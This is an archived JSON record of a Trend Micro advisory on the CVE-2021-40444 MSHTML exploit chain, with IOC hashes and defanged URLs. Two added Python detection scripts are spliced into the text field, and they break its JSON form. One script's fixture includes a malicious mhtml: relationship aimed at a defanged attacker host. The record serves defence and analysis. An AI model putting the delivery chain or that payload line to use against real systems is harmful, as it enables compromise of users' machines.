{
	"id": "841b1b21-6168-46fb-8af2-fb4ca8ab5aa3",
	"created_at": "2026-04-06T00:20:12.218588Z",
	"updated_at": "2026-04-10T03:20:32.184908Z",
	"deleted_at": null,
	"sha1_hash": "282368ee28e9938a54735945158c2fe6cbe76eb3",
	"title": "Remote Code Execution Zero-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 629012,
	"plain_text": "Remote Code Execution Zero-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs\r\nBy: Trend Micro, Sep 09, 2021. Read time: 2 min (453 words)\r\nPublished: 2021-09-09 · Archived: 2026-04-05 17:20:58 UTC\r\nExploits \u0026 Vulnerabilities\r\nMicrosoft has disclosed a new zero-day vulnerability, designated CVE-2021-40444, that affects multiple versions of Windows. The flaw lies in the MSHTML (Trident) browser rendering engine, which a crafted ActiveX control embedded in the document invokes; it is currently delivered via malicious Office documents, and exploitation requires the user to open the file. It should be noted that by default, Office documents downloaded from the internet are opened in either Protected View or Application Guard, both of which mitigate this particular attack.\r\nIf the attacker can convince the victim to download the file and bypass those mitigations (for example, by clicking Enable Editing to leave Protected View), opening it triggers the vulnerability and causes a malicious file to be downloaded and run on the affected machine. At the time of writing, this vulnerability is being used to deliver Cobalt Strike payloads.\r\nMicrosoft has issued an official security advisory covering this vulnerability; it describes interim workarounds but, as of this writing, no patch. This blog entry discusses how the exploit works, as well as Trend Micro solutions.\r\nWe have obtained multiple samples of documents that exploit this vulnerability. The documents all contain the following code in the document.xml.rels file in their package:\r\nFigure 1. Code with XML relationships\r\nNote the presence of a URL (which we have removed) that downloads a file titled side.html (SHA-256: d0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6).\r\n
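A practitioner triaging documents for this chain wants an automated version of the check described above: open the OOXML package, read every .rels part, and flag relationships whose TargetMode is External and whose target reaches out to a remote or mhtml: URL. The following Python is an added example, not code from Trend Micro or from the samples. The package it builds is constructed here, and the mhtml:...!x-usc: target form and the hidusi[.]com host in it are assumptions used for illustration (the host is taken, defanged, from the IOC list below); the figure above does not show the removed URL.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace used by every *.rels part in an OOXML package.
REL_NS = '{http://schemas.openxmlformats.org/package/2006/relationships}'

# Relationship types a benign document rarely points at a remote target.
# hyperlink is deliberately absent: external http hyperlinks are normal.
RISKY_TYPES = ('oleObject', 'attachedTemplate', 'frame', 'subDocument')


def is_suspicious(rel_type, target):
    '''mhtml: targets are suspicious on any relationship type; http(s)/file
    targets are suspicious only on the relationship types listed above.'''
    t = target.lower()
    if t.startswith('mhtml:'):
        return True
    return rel_type in RISKY_TYPES and t.startswith(('http:', 'https:', 'file:'))


def external_relationships(docx_bytes):
    '''Return (part_name, rel_id, rel_type, target) for every external
    relationship in the package that is_suspicious() flags. Every *.rels part
    is scanned, not only word/_rels/document.xml.rels, so a relationship
    hidden in settings.xml.rels or a header part is caught as well.'''
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith('.rels'):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + 'Relationship'):
                if rel.get('TargetMode', 'Internal') != 'External':
                    continue
                target = rel.get('Target', '')
                # Type is a full URI; keep only its last path segment.
                rel_type = rel.get('Type', '').rsplit('/', 1)[-1]
                if is_suspicious(rel_type, target):
                    hits.append((name, rel.get('Id'), rel_type, target))
    return hits


# Constructed rels parts (not taken from a real sample). The benign one has an
# ordinary external hyperlink; the malicious one adds an oleObject relationship
# with an assumed mhtml:...!x-usc: target pointing at a defanged IOC host.
BENIGN_RELS = '''<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<Relationships xmlns='http://schemas.openxmlformats.org/package/2006/relationships'>
  <Relationship Id='rId1' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles' Target='styles.xml'/>
  <Relationship Id='rId2' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink' Target='https://www.trendmicro.com/' TargetMode='External'/>
</Relationships>'''

MALICIOUS_RELS = BENIGN_RELS.replace('</Relationships>', '''  <Relationship Id='rId5' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject' Target='mhtml:http://hidusi[.]com/e8c76295a5f9acb7/side[.]html!x-usc:http://hidusi[.]com/e8c76295a5f9acb7/side[.]html' TargetMode='External'/>
</Relationships>''')


def build_sample_docx(malicious):
    '''Constructed minimal .docx: just enough parts for the scanner to walk.'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('word/document.xml', '<document/>')
        zf.writestr('word/_rels/document.xml.rels',
                    MALICIOUS_RELS if malicious else BENIGN_RELS)
    return buf.getvalue()


if __name__ == '__main__':
    for part, rid, rtype, target in external_relationships(build_sample_docx(True)):
        print(f'{part}: {rid} ({rtype}) -> {target}')
```

The scanner stays quiet on ordinary documents because http hyperlinks are ignored; it fires on mhtml: anywhere and on oleObject, attachedTemplate, frame or subDocument relationships that leave the package, which also covers remote-template injection documents that use the same mechanism.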
This file contained obfuscated JavaScript; Figure 2 shows part of the deobfuscated code.\r\nFigure 2. Deobfuscated JavaScript code\r\nSeveral actions can be seen in this code: it downloads a .CAB file, extracts a .DLL from that .CAB, and uses path traversal attacks to run the extracted file (a DLL named championship.inf, despite the .inf extension).\r\nEventually, this leads to the execution of championship.inf, as seen below:\r\nFigure 3. Properties for execution of payload\r\nThis payload is a Cobalt Strike beacon (SHA-256: 6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b), which we detect as Backdoor.Win64.COBEACON.OSLJAU. As is typically the case with Cobalt Strike, this could allow an attacker to take control of the affected system. The malicious Office files are detected as Trojan.W97M.CVE202140444.A, and the malicious .CAB file as Trojan.Win64.COBEACON.SUZ.\r\nAs we noted earlier, Microsoft has yet to release an official patch. We reiterate our long-standing advice to avoid opening files from unexpected sources; because this threat requires the user to actually open the malicious file, that alone considerably lowers the risk.\r\nWe will update this post as necessary if more information becomes available. Updates on Trend Micro solutions can be found on this knowledge base page.\r\n
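The second stage of the chain described above is the .CAB from which the DLL is extracted with a path traversal. A parser that walks the CFFILE table of a cabinet and reports entry names that would escape the extraction directory is a cheap check to run at a proxy or in a sandbox before anything is extracted. The Python below is an added example, not code from the original post. The cabinet it builds is constructed (header, one CFFOLDER and CFFILE entries, no CFDATA blocks, which is enough to exercise the name parser), and the ../championship.inf entry name is an assumed stand-in for a traversal-style name; the page does not print the real entry name.

```python
import struct

# CFHEADER: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
# versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet (36 bytes)
CFHEADER = struct.Struct('<4sIIIIIBBHHHHH')
# CFFOLDER: coffCabStart, cCFData, typeCompress (8 bytes)
CFFOLDER = struct.Struct('<IHH')
# CFFILE fixed part: cbFile, uoffFolderStart, iFolder, date, time, attribs,
# followed by a NUL-terminated name (16 bytes + name)
CFFILE_FIXED = struct.Struct('<IIHHHH')
ATTR_NAME_IS_UTF = 0x80   # attribs bit: szName is UTF-8 rather than ANSI


def cab_file_names(cab):
    '''Return (name, size, attribs) for every CFFILE entry in a cabinet.
    The table is located via coffFiles from the header, so optional reserve
    areas and prev/next cabinet strings (which sit before the folders) need
    not be parsed. Raises ValueError on malformed or truncated input.'''
    if len(cab) < CFHEADER.size or cab[:4] != b'MSCF':
        raise ValueError('not a cabinet file')
    (_sig, _r1, _cb, _r2, coff_files, _r3, vminor, vmajor,
     _c_folders, c_files, _flags, _set_id, _i_cab) = CFHEADER.unpack_from(cab, 0)
    if (vmajor, vminor) != (1, 3):
        raise ValueError(f'unsupported cabinet version {vmajor}.{vminor}')
    entries = []
    pos = coff_files
    for _ in range(c_files):
        if pos + CFFILE_FIXED.size > len(cab):
            raise ValueError('truncated CFFILE table')
        cb_file, _uoff, _ifolder, _date, _time, attribs = CFFILE_FIXED.unpack_from(cab, pos)
        pos += CFFILE_FIXED.size
        end = cab.find(0, pos)          # NUL terminator of szName
        if end < 0:
            raise ValueError('unterminated CFFILE name')
        codec = 'utf-8' if attribs & ATTR_NAME_IS_UTF else 'cp1252'
        entries.append((cab[pos:end].decode(codec, errors='replace'), cb_file, attribs))
        pos = end + 1
    return entries


def traversal_entries(entries):
    '''Names that escape the extraction directory: a .. component on either
    separator, a rooted path, or a drive-letter prefix.'''
    sep = chr(92)   # Windows path separator, spelled chr(92) in this listing
    bad = []
    for name, _size, _attribs in entries:
        norm = name.replace(sep, '/')
        parts = norm.split('/')
        rooted = norm.startswith('/') or (len(name) > 1 and name[1] == ':')
        if '..' in parts or rooted:
            bad.append(name)
    return bad


def build_sample_cab(names):
    '''Constructed cabinet: header, one MSZIP folder and one CFFILE per name,
    with no CFDATA blocks. Sizes and timestamps are arbitrary.'''
    files = b''
    for name in names:
        encoded = name.encode('utf-8')
        attribs = 0x20 | (ATTR_NAME_IS_UTF if any(b > 127 for b in encoded) else 0)
        files += CFFILE_FIXED.pack(0x1000, 0, 0, 0x5321, 0x6000, attribs) + encoded + bytes(1)
    coff_files = CFHEADER.size + CFFOLDER.size
    cb_cabinet = coff_files + len(files)
    folder = CFFOLDER.pack(cb_cabinet, 0, 1)   # data would start after the file table
    header = CFHEADER.pack(b'MSCF', 0, cb_cabinet, 0, coff_files, 0,
                           3, 1, 1, len(names), 0, 0x1234, 0)
    return header + folder + files


if __name__ == '__main__':
    sample = build_sample_cab(['readme.txt', '../championship.inf'])
    for name in traversal_entries(cab_file_names(sample)):
        print(f'traversal in CFFILE name: {name}')
```

Because the check reads only the file table, it costs nothing to run on every cabinet that crosses a gateway, and it is independent of the compression used for the data blocks; a real extractor should in addition refuse any resolved output path that does not stay under the destination directory.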
\r\nIndicators of Compromise\r\nSHA-256 | File description | Detection name\r\n1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00 | Payload (CAB) | Trojan.Win64.COBEACON.SUZ\r\n5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185 | Exploited Doc | Trojan.W97M.CVE202140444.A\r\n3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf | Exploited Doc | Trojan.W97M.CVE202140444.A\r\n199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455 | Exploited Doc | Trojan.W97M.CVE202140444.A\r\n938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 | Exploited Doc | Trojan.W97M.CVE202140444.A\r\nd0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745 | Exploited Doc | Trojan.W97M.CVE202140444.A\r\na5f55361eff96ff070818640d417d2c822f9ae1cdd7e8fa0db943f37f6494db9 | Exploited Doc | Trojan.W97M.CVE202140444.A\r\n6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b | Payload (DLL) | Backdoor.Win64.COBEACON.OSLJAU\r\nd0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6 | Downloaded JS | Trojan.JS.TIVEX.A\r\nURL category: Malware Accomplice\r\nhxxp://hidusi[.]com/\r\nhxxp://hidusi[.]com/e273caf2ca371919/mountain[.]html\r\nhxxp://hidusi[.]com/94cc140dcee6068a/help[.]html\r\nhxxp://hidusi[.]com/e8c76295a5f9acb7/side[.]html\r\nhxxp://hidusi[.]com/e8c76295a5f9acb7/ministry[.]cab\r\nURL category: C\u0026C Server\r\nhxxps://joxinu[.]com\r\nhxxps://joxinu[.]com/hr[.]html\r\nhxxps://dodefoh[.]com\r\nhxxps://dodefoh[.]com/ml[.]html\r\nhxxp://pawevi[.]com/e32c8df2cf6b7a16/specify[.]html\r\nURL category: Malware Accomplice\r\nhxxp://sagoge[.]com/\r\nhxxps://comecal[.]com/\r\nhxxps://rexagi[.]com/\r\nhxxp://sagoge[.]com/get_load\r\nhxxps://comecal[.]com/static-directory/templates[.]gif\r\nhxxps://comecal[.]com/ml[.]js?restart=false\r\nhxxps://comecal[.]com/avatars\r\nhxxps://rexagi[.]com:443/avatars\r\nhxxps://rexagi[.]com/ml[.]js?restart=false\r\nhxxps://macuwuf[.]com\r\nhxxps://macuwuf[.]com/get_load\r\nSource: https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html"
	],
	"report_names": [
		"remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434812,
	"ts_updated_at": 1775791232,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/282368ee28e9938a54735945158c2fe6cbe76eb3.pdf",
		"text": "https://archive.orkl.eu/282368ee28e9938a54735945158c2fe6cbe76eb3.txt",
		"img": "https://archive.orkl.eu/282368ee28e9938a54735945158c2fe6cbe76eb3.jpg"
	}
}